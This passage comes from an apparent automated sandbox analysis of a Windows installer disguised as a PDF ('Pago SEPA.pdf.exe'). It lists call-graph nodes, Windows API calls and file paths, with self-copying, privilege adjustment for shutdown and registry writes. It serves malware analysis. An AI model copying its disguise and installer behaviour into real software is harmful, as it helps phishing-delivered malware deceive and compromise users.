calls 3802->3803 3804 402393 3803->3804 3805 402bbf 18 API calls 3804->3805 3806 40239d RegCreateKeyExW 3805->3806 3807 4023c7 3806->3807 3808 402a4c 3806->3808 3809 4023e2 3807->3809 3810 402bbf 18 API calls 3807->3810 3811 4023ee 3809->3811 3818 402ba2 3809->3818 3812 4023d8 lstrlenW 3810->3812 3814 402409 RegSetValueExW 3811->3814 3815 403027 36 API calls 3811->3815 3812->3809 3816 40241f RegCloseKey 3814->3816 3815->3814 3816->3808 3819 406041 18 API calls 3818->3819 3820 402bb6 3819->3820 3820->3811 4285 4027fb 4286 402bbf 18 API calls 4285->4286 4287 402802 FindFirstFileW 4286->4287 4288 40282a 4287->4288 4291 402815 4287->4291 4289 402833 4288->4289 4293 405f66 wsprintfW 4288->4293 4294 40601f lstrcpynW 4289->4294 4293->4289 4294->4291 4295 40457e 4296 4045aa 4295->4296 4297 4045bb 4295->4297 4356 405748 GetDlgItemTextW 4296->4356 4299 4045c7 GetDlgItem 4297->4299 4301 404626 4297->4301 4300 4045db 4299->4300 4305 4045ef SetWindowTextW 4300->4305 4308 405a7e 4 API calls 4300->4308 4302 40470a 4301->4302 4310 406041 18 API calls 4301->4310 4354 4048b9 4301->4354 4302->4354 4358 405748 GetDlgItemTextW 4302->4358 4303 4045b5 4304 4062b3 5 API calls 4303->4304 4304->4297 4309 4040e3 19 API calls 4305->4309 4307 40414a 8 API calls 4312 4048cd 4307->4312 4313 4045e5 4308->4313 4314 40460b 4309->4314 4315 40469a SHBrowseForFolderW 4310->4315 4311 40473a 4316 405adb 18 API calls 4311->4316 4313->4305 4320 4059d3 3 API calls 4313->4320 4317 4040e3 19 API calls 4314->4317 4315->4302 4318 4046b2 CoTaskMemFree 4315->4318 4319 404740 4316->4319 4321 404619 4317->4321 4322 4059d3 3 API calls 4318->4322 4359 40601f lstrcpynW 4319->4359 4320->4305 4357 404118 SendMessageW 4321->4357 4324 4046bf 4322->4324 4327 4046f6 SetDlgItemTextW 4324->4327 4331 406041 18 API calls 4324->4331 4326 40461f 4329 4063f5 5 API calls 4326->4329 4327->4302 4328 404757 4330 4063f5 5 API calls 4328->4330 4329->4301 4337 40475e 4330->4337 4332 4046de lstrcmpiW 4331->4332 4332->4327 4334 4046ef 
lstrcatW 4332->4334 4333 40479f 4360 40601f lstrcpynW 4333->4360 4334->4327 4336 4047a6 4338 405a7e 4 API calls 4336->4338 4337->4333 4342 405a1f 2 API calls 4337->4342 4343 4047f7 4337->4343 4339 4047ac GetDiskFreeSpaceW 4338->4339 4341 4047d0 MulDiv 4339->4341 4339->4343 4341->4343 4342->4337 4344 404868 4343->4344 4346 404a03 21 API calls 4343->4346 4345 40488b 4344->4345 4347 40140b 2 API calls 4344->4347 4361 404105 KiUserCallbackDispatcher 4345->4361 4348 404855 4346->4348 4347->4345 4350 40486a SetDlgItemTextW 4348->4350 4351 40485a 4348->4351 4350->4344 4352 40493a 21 API calls 4351->4352 4352->4344 4353 4048a7 4353->4354 4362 404513 4353->4362 4354->4307 4356->4303 4357->4326 4358->4311 4359->4328 4360->4336 4361->4353 4363 404521 4362->4363 4364 404526 SendMessageW 4362->4364 4363->4364 4364->4354 4365 4014ff 4366 401507 4365->4366 4368 40151a 4365->4368 4367 402ba2 18 API calls 4366->4367 4367->4368 4369 401000 4370 401037 BeginPaint GetClientRect 4369->4370 4371 40100c DefWindowProcW 4369->4371 4373 4010f3 4370->4373 4374 401179 4371->4374 4375 401073 CreateBrushIndirect FillRect DeleteObject 4373->4375 4376 4010fc 4373->4376 4375->4373 4377 401102 CreateFontIndirectW 4376->4377 4378 401167 EndPaint 4376->4378 4377->4378 4379 401112 6 API calls 4377->4379 4378->4374 4379->4378 4380 404280 4381 4043b2 4380->4381 4383 404298 4380->4383 4382 40441c 4381->4382 4385 4044ee 4381->4385 4389 4043ed GetDlgItem SendMessageW 4381->4389 4384 404426 GetDlgItem 4382->4384 4382->4385 4388 4040e3 19 API calls 4383->4388 4386 404440 4384->4386 4387 4044af 4384->4387 4391 40414a 8 API calls 4385->4391 4386->4387 4393 404466 6 API calls 4386->4393 4387->4385 4394 4044c1 4387->4394 4390 4042ff 4388->4390 4411 404105 KiUserCallbackDispatcher 4389->4411 4396 4040e3 19 API calls 4390->4396 4392 4044e9 4391->4392 4393->4387 4398 4044d7 4394->4398 4399 4044c7 SendMessageW 4394->4399 4397 40430c CheckDlgButton 4396->4397 4409 404105 KiUserCallbackDispatcher 4397->4409 4398->4392 
4402 4044dd SendMessageW 4398->4402 4399->4398 4400 404417 4403 404513 SendMessageW 4400->4403 4402->4392 4403->4382 4404 40432a GetDlgItem 4410 404118 SendMessageW 4404->4410 4406 404340 SendMessageW 4407 404366 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4406->4407 4408 40435d GetSysColor 4406->4408 4407->4392 4408->4407 4409->4404 4410->4406 4411->4400 4419 401904 4420 40193b 4419->4420 4421 402bbf 18 API calls 4420->4421 4422 401940 4421->4422 4423 405810 69 API calls 4422->4423 4424 401949 4423->4424 4425 402d04 4426 402d16 SetTimer 4425->4426 4427 402d2f 4425->4427 4426->4427 4428 402d84 4427->4428 4429 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4427->4429 4429->4428 4430 402786 4431 4029f7 4430->4431 4432 40278d 4430->4432 4433 402ba2 18 API calls 4432->4433 4434 402798 4433->4434 4435 40279f SetFilePointer 4434->4435 4435->4431 4436 4027af 4435->4436 4438 405f66 wsprintfW 4436->4438 4438->4431 4439 401907 4440 402bbf 18 API calls 4439->4440 4441 40190e 4440->4441 4442 405764 MessageBoxIndirectW 4441->4442 4443 401917 4442->4443 4444 401e08 4445 402bbf 18 API calls 4444->4445 4446 401e0e 4445->4446 4447 402bbf 18 API calls 4446->4447 4448 401e17 4447->4448 4449 402bbf 18 API calls 4448->4449 4450 401e20 4449->4450 4451 402bbf 18 API calls 4450->4451 4452 401e29 4451->4452 4453 401423 25 API calls 4452->4453 4454 401e30 ShellExecuteW 4453->4454 4455 401e61 4454->4455 3593 403c0b 3594 403c23 3593->3594 3595 403d5e 3593->3595 3594->3595 3596 403c2f 3594->3596 3597 403daf 3595->3597 3598 403d6f GetDlgItem GetDlgItem 3595->3598 3599 403c3a SetWindowPos 3596->3599 3600 403c4d 3596->3600 3602 403e09 3597->3602 3610 401389 2 API calls 3597->3610 3601 4040e3 19 API calls 3598->3601 3599->3600 3604 403c52 ShowWindow 3600->3604 3605 403c6a 3600->3605 3606 403d99 SetClassLongW 3601->3606 3603 40412f SendMessageW 3602->3603 3623 403d59 3602->3623 3632 403e1b 3603->3632 3604->3605 3607 403c72 DestroyWindow 3605->3607 3608 403c8c 3605->3608 
3609 40140b 2 API calls 3606->3609 3662 40406c 3607->3662 3612 403c91 SetWindowLongW 3608->3612 3613 403ca2 3608->3613 3609->3597 3611 403de1 3610->3611 3611->3602 3614 403de5 SendMessageW 3611->3614 3612->3623 3617 403d4b 3613->3617 3618 403cae GetDlgItem 3613->3618 3614->3623 3615 40140b 2 API calls 3615->3632 3616 40406e DestroyWindow KiUserCallbackDispatcher 3616->3662 3672 40414a 3617->3672 3621 403cc1 SendMessageW IsWindowEnabled 3618->3621 3622 403cde 3618->3622 3620 40409d ShowWindow 3620->3623 3621->3622 3621->3623 3625 403ceb 3622->3625 3626 403d32 SendMessageW 3622->3626 3627 403cfe 3622->3627 3637 403ce3 3622->3637 3624 406041 18 API calls 3624->3632 3625->3626 3625->3637 3626->3617 3629 403d06 3627->3629 3630 403d1b 3627->3630 3633 40140b 2 API calls 3629->3633 3634 40140b 2 API calls 3630->3634 3631 403d19 3631->3617 3632->3615 3632->3616 3632->3623 3632->3624 3635 4040e3 19 API calls 3632->3635 3653 403fae DestroyWindow 3632->3653 3663 4040e3 3632->3663 3633->3637 3636 403d22 3634->3636 3635->3632 3636->3617 3636->3637 3669 4040bc 3637->3669 3639 403e96 GetDlgItem 3640 403eb3 ShowWindow KiUserCallbackDispatcher 3639->3640 3641 403eab 3639->3641 3666 404105 KiUserCallbackDispatcher 3640->3666 3641->3640 3643 403edd EnableWindow 3647 403ef1 3643->3647 3644 403ef6 GetSystemMenu EnableMenuItem SendMessageW 3645 403f26 SendMessageW 3644->3645 3644->3647 3645->3647 3647->3644 3667 404118 SendMessageW 3647->3667 3668 40601f lstrcpynW 3647->3668 3649 403f54 lstrlenW 3650 406041 18 API calls 3649->3650 3651 403f6a SetWindowTextW 3650->3651 3652 401389 2 API calls 3651->3652 3652->3632 3654 403fc8 CreateDialogParamW 3653->3654 3653->3662 3655 403ffb 3654->3655 3654->3662 3656 4040e3 19 API calls 3655->3656 3657 404006 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3656->3657 3658 401389 2 API calls 3657->3658 3659 40404c 3658->3659 3659->3623 3660 404054 ShowWindow 3659->3660 3661 40412f SendMessageW 3660->3661 3661->3662 3662->3620 3662->3623 3664 
406041 18 API calls 3663->3664 3665 4040ee SetDlgItemTextW 3664->3665 3665->3639 3666->3643 3667->3647 3668->3649 3670 4040c3 3669->3670 3671 4040c9 SendMessageW 3669->3671 3670->3671 3671->3631 3673 404162 GetWindowLongW 3672->3673 3683 4041eb 3672->3683 3674 404173 3673->3674 3673->3683 3675 404182 GetSysColor 3674->3675 3676 404185 3674->3676 3675->3676 3677 404195 SetBkMode 3676->3677 3678 40418b SetTextColor 3676->3678 3679 4041b3 3677->3679 3680 4041ad GetSysColor 3677->3680 3678->3677 3681 4041c4 3679->3681 3682 4041ba SetBkColor 3679->3682 3680->3679 3681->3683 3684 4041d7 DeleteObject 3681->3684 3685 4041de CreateBrushIndirect 3681->3685 3682->3681 3683->3623 3684->3685 3685->3683 3686 40378e 3687 4037a6 3686->3687 3688 403798 CloseHandle 3686->3688 3693 4037d3 3687->3693 3688->3687 3694 4037e1 3693->3694 3695 4037e6 FreeLibrary GlobalFree 3694->3695 3696 4037ab 3694->3696 3695->3695 3695->3696 3697 405810 3696->3697 3698 405adb 18 API calls 3697->3698 3699 405830 3698->3699 3700 405838 DeleteFileW 3699->3700 3701 40584f 3699->3701 3730 4037b7 3700->3730 3706 40596f 3701->3706 3733 40601f lstrcpynW 3701->3733 3703 405875 3704 405888 3703->3704 3705 40587b lstrcatW 3703->3705 3709 405a1f 2 API calls 3704->3709 3708 40588e 3705->3708 3707 406362 2 API calls 3706->3707 3706->3730 3710 405994 3707->3710 3711 40589e lstrcatW 3708->3711 3712 4058a9 lstrlenW FindFirstFileW 3708->3712 3709->3708 3713 4059d3 3 API calls 3710->3713 3710->3730 3711->3712 3712->3706 3731 4058cb 3712->3731 3714 40599e 3713->3714 3716 4057c8 5 API calls 3714->3716 3715 405952 FindNextFileW 3719 405968 FindClose 3715->3719 3715->3731 3718 4059aa 3716->3718 3720 4059c4 3718->3720 3721 4059ae 3718->3721 3719->3706 3723 40517e 25 API calls 3720->3723 3724 40517e 25 API calls 3721->3724 3721->3730 3723->3730 3726 4059bb 3724->3726 3725 405810 62 API calls 3725->3731 3728 405ec0 38 API calls 3726->3728 3727 40517e 25 API calls 3727->3715 3728->3730 3729 40517e 25 API calls 3729->3731 
3731->3715 3731->3725 3731->3727 3731->3729 3732 405ec0 38 API calls 3731->3732 3734 40601f lstrcpynW 3731->3734 3735 4057c8 3731->3735 3732->3731 3733->3703 3734->3731 3736 405bcf 2 API calls 3735->3736 3737 4057d4 3736->3737 3738 4057f5 3737->3738 3739 4057e3 RemoveDirectoryW 3737->3739 3740 4057eb DeleteFileW 3737->3740 3738->3731 3741 4057f1 3739->3741 3740->3741 3741->3738 3742 405801 SetFileAttributesW 3741->3742 3742->3738 4461 401491 4462 40517e 25 API calls 4461->4462 4463 401498 4462->4463 4464 401a15 4465 402bbf 18 API calls 4464->4465 4466 401a1e ExpandEnvironmentStringsW 4465->4466 4467 401a32 4466->4467 4468 401a45 4466->4468 4467->4468 4469 401a37 lstrcmpW 4467->4469 4469->4468 4470 402515 4471 402bbf 18 API calls 4470->4471 4472 40251c 4471->4472 4475 405bf4 GetFileAttributesW CreateFileW 4472->4475 4474 402528 4475->4474 4476 402095 4477 402bbf 18 API calls 4476->4477 4478 40209c 4477->4478 4479 402bbf 18 API calls 4478->4479 4480 4020a6 4479->4480 4481 402bbf 18 API calls 4480->4481 4482 4020b0 4481->4482 4483 402bbf 18 API calls 4482->4483 4484 4020ba 4483->4484 4485 402bbf 18 API calls 4484->4485 4487 4020c4 4485->4487 4486 402103 CoCreateInstance 4491 402122 4486->4491 4487->4486 4488 402bbf 18 API calls 4487->4488 4488->4486 4489 401423 25 API calls 4490 4021e1 4489->4490 4491->4489 4491->4490 4492 401b16 4493 402bbf 18 API calls 4492->4493 4494 401b1d 4493->4494 4495 402ba2 18 API calls 4494->4495 4496 401b26 wsprintfW 4495->4496 4497 402a4c 4496->4497 4498 406b18 4499 406567 4498->4499 4499->4499 4500 4065f1 GlobalAlloc 4499->4500 4501 4065e8 GlobalFree 4499->4501 4502 406ed2 4499->4502 4503 406668 GlobalAlloc 4499->4503 4504 40665f GlobalFree 4499->4504 4500->4499 4500->4502 4501->4500 4503->4499 4503->4502 4504->4503 3821 40159b 3822 402bbf 18 API calls 3821->3822 3823 4015a2 SetFileAttributesW 3822->3823 3824 4015b4 3823->3824 3825 401f1d 3826 402bbf 18 API calls 3825->3826 3827 401f24 3826->3827 3828 4063f5 5 API calls 3827->3828 3829 
401f33 GetFileVersionInfoSizeW 3828->3829 3830 401f4f GlobalAlloc 3829->3830 3832 402a4c 3829->3832 3831 401f63 3830->3831 3830->3832 3833 4063f5 5 API calls 3831->3833 3834 401f6a 3833->3834 3835 4063f5 5 API calls 3834->3835 3837 401f74 3835->3837 3836 401fb7 3836->3832 3837->3836 3841 405f66 wsprintfW 3837->3841 3839 401fa9 3842 405f66 wsprintfW 3839->3842 3841->3839 3842->3836 4512 40229d 4513 4022a5 4512->4513 4514 4022ab 4512->4514 4515 402bbf 18 API calls 4513->4515 4516 402bbf 18 API calls 4514->4516 4517 4022b9 4514->4517 4515->4514 4516->4517 4518 4022c7 4517->4518 4519 402bbf 18 API calls 4517->4519 4520 402bbf 18 API calls 4518->4520 4519->4518 4521 4022d0 WritePrivateProfileStringW 4520->4521 4522 40149e 4523 402288 4522->4523 4524 4014ac PostQuitMessage 4522->4524 4524->4523 4525 40249e 4526 402cc9 19 API calls 4525->4526 4527 4024a8 4526->4527 4528 402ba2 18 API calls 4527->4528 4529 4024b1 4528->4529 4530 4024d5 RegEnumValueW 4529->4530 4531 4024c9 RegEnumKeyW 4529->4531 4533 40281e 4529->4533 4532 4024ee RegCloseKey 4530->4532 4530->4533 4531->4532 4532->4533 4535 40231f 4536 402324 4535->4536 4537 40234f 4535->4537 4538 402cc9 19 API calls 4536->4538 4539 402bbf 18 API calls 4537->4539 4540 40232b 4538->4540 4542 402356 4539->4542 4541 402bbf 18 API calls 4540->4541 4545 40236c 4540->4545 4543 40233c RegDeleteValueW RegCloseKey 4541->4543 4546 402bff RegOpenKeyExW 4542->4546 4543->4545 4550 402c2a 4546->4550 4555 402c76 4546->4555 4547 402c50 RegEnumKeyW 4548 402c62 RegCloseKey 4547->4548 4547->4550 4551 4063f5 5 API calls 4548->4551 4549 402c87 RegCloseKey 4549->4555 4550->4547 4550->4548 4550->4549 4552 402bff 5 API calls 4550->4552 4553 402c72 4551->4553 4552->4550 4554 402ca2 RegDeleteKeyW 4553->4554 4553->4555 4554->4555 4555->4545 4563 401ca3 4564 402ba2 18 API calls 4563->4564 4565 401ca9 IsWindow 4564->4565 4566 401a05 4565->4566 4567 403826 4568 403831 4567->4568 4569 403835 4568->4569 4570 403838 GlobalAlloc 4568->4570 4570->4569 4571 
402a27 SendMessageW 4572 402a41 InvalidateRect 4571->4572 4573 402a4c 4571->4573 4572->4573 3577 40242a 3588 402cc9 3577->3588 3579 402434 3580 402bbf 18 API calls 3579->3580 3581 40243d 3580->3581 3582 402448 RegQueryValueExW 3581->3582 3585 40281e 3581->3585 3583 40246e RegCloseKey 3582->3583 3584 402468 3582->3584 3583->3585 3584->3583 3592 405f66 wsprintfW 3584->3592 3589 402bbf 18 API calls 3588->3589 3590 402ce2 3589->3590 3591 402cf0 RegOpenKeyExW 3590->3591 3591->3579 3592->3583 4574 40172d 4575 402bbf 18 API calls 4574->4575 4576 401734 SearchPathW 4575->4576 4577 40174f 4576->4577 4585 404231 lstrlenW 4586 404250 4585->4586 4587 404252 WideCharToMultiByte 4585->4587 4586->4587 4588 4027b4 4589 4027ba 4588->4589 4590 4027c2 FindClose 4589->4590 4591 402a4c 4589->4591 4590->4591 3749 401b37 3750 401b44 3749->3750 3751 401b88 3749->3751 3754 401bcd 3750->3754 3759 401b5b 3750->3759 3752 401bb2 GlobalAlloc 3751->3752 3753 401b8d 3751->3753 3755 406041 18 API calls 3752->3755 3762 402288 3753->3762 3770 40601f lstrcpynW 3753->3770 3756 406041 18 API calls 3754->3756 3754->3762 3755->3754 3757 402282 3756->3757 3764 405764 MessageBoxIndirectW 3757->3764 3768 40601f lstrcpynW 3759->3768 3760 401b9f GlobalFree 3760->3762 3763 401b6a 3769 40601f lstrcpynW 3763->3769 3764->3762 3766 401b79 3771 40601f lstrcpynW 3766->3771 3768->3763 3769->3766 3770->3760 3771->3762 4592 404537 4593 404547 4592->4593 4594 40456d 4592->4594 4595 4040e3 19 API calls 4593->4595 4596 40414a 8 API calls 4594->4596 4597 404554 SetDlgItemTextW 4595->4597 4598 404579 4596->4598 4597->4594 4599 402537 4600 402562 4599->4600 4601 40254b 4599->4601 4603 402596 4600->4603 4604 402567 4600->4604 4602 402ba2 18 API calls 4601->4602 4610 402552 4602->4610 4605 402bbf 18 API calls 4603->4605 4606 402bbf 18 API calls 4604->4606 4607 40259d lstrlenW 4605->4607 4608 40256e WideCharToMultiByte lstrlenA 4606->4608 4607->4610 4608->4610 4609 4025e0 4610->4609 4612 405cd5 5 API calls 4610->4612 4613 
4025ca 4610->4613 4611 405ca6 WriteFile 4611->4609 4612->4613 4613->4609 4613->4611 4614 4014b8 4615 4014be 4614->4615 4616 401389 2 API calls 4615->4616 4617 4014c6 4616->4617 3778 4015b9 3779 402bbf 18 API calls 3778->3779 3780 4015c0 3779->3780 3781 405a7e 4 API calls 3780->3781 3793 4015c9 3781->3793 3782 401629 3784 40165b 3782->3784 3785 40162e 3782->3785 3783 405a00 CharNextW 3783->3793 3787 401423 25 API calls 3784->3787 3797 401423 3785->3797 3794 401653 3787->3794 3790 4056ca 2 API calls 3790->3793 3791 4056e7 5 API calls 3791->3793 3792 401642 SetCurrentDirectoryW 3792->3794 3793->3782 3793->3783 3793->3790 3793->3791 3795 40160f GetFileAttributesW 3793->3795 3796 40564d 4 API calls 3793->3796 3795->3793 3796->3793 3798 40517e 25 API calls 3797->3798 3799 401431 3798->3799 3800 40601f lstrcpynW 3799->3800 3800->3792 4618 40293b 4619 402ba2 18 API calls 4618->4619 4620 402941 4619->4620 4621 402964 4620->4621 4622 40297d 4620->4622 4627 40281e 4620->4627 4623 402969 4621->4623 4624 40297a 4621->4624 4625 402993 4622->4625 4626 402987 4622->4626 4632 40601f lstrcpynW 4623->4632 4633 405f66 wsprintfW 4624->4633 4629 406041 18 API calls 4625->4629 4628 402ba2 18 API calls 4626->4628 4628->4627 4629->4627 4632->4627 4633->4627 3843 4052bd 3844 405467 3843->3844 3845 4052de GetDlgItem GetDlgItem GetDlgItem 3843->3845 3846 405470 GetDlgItem CreateThread CloseHandle 3844->3846 3847 405498 3844->3847 3888 404118 SendMessageW 3845->3888 3846->3847 3891 405251 5 API calls 3846->3891 3849 4054c3 3847->3849 3851 4054e8 3847->3851 3852 4054af ShowWindow ShowWindow 3847->3852 3853 405523 3849->3853 3856 4054d7 3849->3856 3857 4054fd ShowWindow 3849->3857 3850 40534e 3854 405355 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3850->3854 3858 40414a 8 API calls 3851->3858 3890 404118 SendMessageW 3852->3890 3853->3851 3861 405531 SendMessageW 3853->3861 3859 4053c3 3854->3859 3860 4053a7 SendMessageW SendMessageW 3854->3860 3862 4040bc SendMessageW 3856->3862 
3864 40551d 3857->3864 3865 40550f 3857->3865 3863 4054f6 3858->3863 3867 4053d6 3859->3867 3868 4053c8 SendMessageW 3859->3868 3860->3859 3861->3863 3869 40554a CreatePopupMenu 3861->3869 3862->3851 3866 4040bc SendMessageW 3864->3866 3870 40517e 25 API calls 3865->3870 3866->3853 3872 4040e3 19 API calls 3867->3872 3868->3867 3871 406041 18 API calls 3869->3871 3870->3864 3873 40555a AppendMenuW 3871->3873 3874 4053e6 3872->3874 3875 405577 GetWindowRect 3873->3875 3876 40558a TrackPopupMenu 3873->3876 3877 405423 GetDlgItem SendMessageW 3874->3877 3878 4053ef ShowWindow 3874->3878 3875->3876 3876->3863 3879 4055a5 3876->3879 3877->3863 3882 40544a SendMessageW SendMessageW 3877->3882 3880 405412 3878->3880 3881 405405 ShowWindow 3878->3881 3883 4055c1 SendMessageW 3879->3883 3889 404118 SendMessageW 3880->3889 3881->3880 3882->3863 3883->3883 3884 4055de OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3883->3884 3886 405603 SendMessageW 3884->3886 3886->3886 3887 40562c GlobalUnlock SetClipboardData CloseClipboard 3886->3887 3887->3863 3888->3850 3889->3877 3890->3849

Control-flow Graph

• Executed
• Not Executed

[Control-flow graph of the function at 0040326A: the report lists its basic-block address ranges, the API calls and subcalls made in each block, and the block-to-block edges; the rendered graph is not reproducible in text. The APIs this function resolves are listed below.]

APIs
• SetErrorMode.KERNELBASE ref: 0040328C
• GetVersion.KERNEL32 ref: 00403292
• #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004032E2
• OleInitialize.OLE32(00000000), ref: 004032E9
• SHGetFileInfoW.SHELL32(004206C8,00000000,?,000002B4,00000000), ref: 00403305
• GetCommandLineW.KERNEL32(00428220,NSIS Error), ref: 0040331A
• GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",00000000), ref: 0040332D
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",00000020), ref: 00403354
  • Part of subcall function 004063F5: GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
  • Part of subcall function 004063F5: GetProcAddress.KERNEL32(00000000,?), ref: 00406422
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040348F
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034A0
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034AC
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034C0
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034C8
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D9
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034E1
• DeleteFileW.KERNELBASE(1033), ref: 004034F5
  • Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C
• ExitProcess.KERNEL32(?), ref: 004035BB
• CoUninitialize.COMBASE(?), ref: 004035C0
• ExitProcess.KERNEL32 ref: 004035E2
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",00000000,?), ref: 004035F5
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040926C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",00000000,?), ref: 00403604
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",00000000,?), ref: 0040360F
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",00000000,?), ref: 0040361B
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403637
• DeleteFileW.KERNEL32(0041FEC8,0041FEC8,?,0042A000,?), ref: 00403691
• CopyFileW.KERNEL32(C:\Users\user\Desktop\Pago SEPA.pdf.exe,0041FEC8,00000001), ref: 004036A5
• CloseHandle.KERNEL32(00000000,0041FEC8,0041FEC8,?,0041FEC8,00000000), ref: 004036D2
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00403701
• OpenProcessToken.ADVAPI32(00000000), ref: 00403708
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040371D
• AdjustTokenPrivileges.ADVAPI32 ref: 00403740
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403765
• ExitProcess.KERNEL32 ref: 00403788

Strings

Memory Dump Source
• Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Processlstrcat$ExitFile$Handle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                      • String ID: "C:\Users\user\Desktop\Pago SEPA.pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers$C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers$C:\Users\user\Desktop$C:\Users\user\Desktop\Pago SEPA.pdf.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                      • API String ID: 2251725264-4141526573
                                                                      • Opcode ID: fda6c057a4537dba88034d229a92b30a1776572ee97949e398e0e99b98fea1a3
                                                                      • Instruction ID: 47b2dd04bf5340fec55df09ad24e258ddf9dfe897e1895205e314fce2ef220c4
                                                                      • Opcode Fuzzy Hash: fda6c057a4537dba88034d229a92b30a1776572ee97949e398e0e99b98fea1a3
                                                                      • Instruction Fuzzy Hash: 08D12770604200BAD720BF659D49A3B3AACEB4170AF50487FF441B61D2DB7D9941CB6E

                                                                      Control-flow Graph (rendered graph image omitted; block edges not reproduced)
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040531B
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040532A
                                                                      • GetClientRect.USER32(?,?), ref: 00405367
                                                                      • GetSystemMetrics.USER32(00000002), ref: 0040536E
                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538F
                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053A0
                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053B3
                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053C1
                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053D4
                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053F6
                                                                      • ShowWindow.USER32(?,00000008), ref: 0040540A
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040542B
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040543B
                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405454
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405460
                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405339
                                                                        • Part of subcall function 00404118: SendMessageW.USER32(00000028,?,00000001,00403F44), ref: 00404126
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040547D
                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005251,00000000), ref: 0040548B
                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00405492
